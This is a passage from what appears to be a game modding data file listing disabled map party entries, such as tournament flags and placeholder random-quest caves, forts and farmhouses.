("attack_target", " ", icon_attack_target|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("defence_target", " ", icon_defence_target|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("tournament_flag_1", " ", icon_tournament_flag|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("tournament_flag_2", " ", icon_tournament_flag|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("tournament_flag_3", " ", icon_tournament_flag|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("tournament_flag_4", " ", icon_tournament_flag|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("tournament_flag_5", " ", icon_tournament_flag|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("tournament_flag_6", " ", icon_tournament_flag|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("tournament_flag_7", " ", icon_tournament_flag|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("tournament_flag_8", " ", icon_tournament_flag|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_01", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_02", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_03", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_04", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_05", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_06", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_07", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_08", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_09", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_10", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_11", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_12", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_13", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_14", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_15", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_16", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_17", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_18", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_19", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_20", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_21", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_22", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_23", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_24", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_25", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_26", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_27", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_28", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_29", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_30", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_31", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_32", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_33", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_34", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_35", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_36", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_37", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_38", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_39", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_40", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_41", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_42", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_43", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_44", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_45", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_46", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_47", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_48", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_49", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_50", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_end", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_01", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_02", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_03", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_04", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_05", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_06", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_07", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_08", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_09", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_10", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_11", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_12", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_13", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_14", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_15", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_16", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_17", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_18", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_19", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_20", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_21", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_22", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_23", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_24", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_25", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_26", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_27", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_28", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_29", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_30", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_31", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_32", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_33", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_34", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_35", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_36", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_37", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_38", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_39", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_40", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_fort_end", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_rescue_lady_01", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_rescue_lady_02", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_rescue_lady_03", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_rescue_lady_end", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_01", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_02", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_03", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_04", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_05", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_06", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_07", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_08", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_09", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_10", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_11", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_12", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_13", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_14", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_15", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_16", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_17", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_18", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_19", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_20", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_nomad_end", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_01", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_02", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_03", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_04", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_05", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_06", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_07", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_08", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_09", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_10", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_11", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_12", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_13", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_14", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_15", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_16", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_17", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_18", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_19", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_20", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_21", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_22", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_farmhouse_23", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
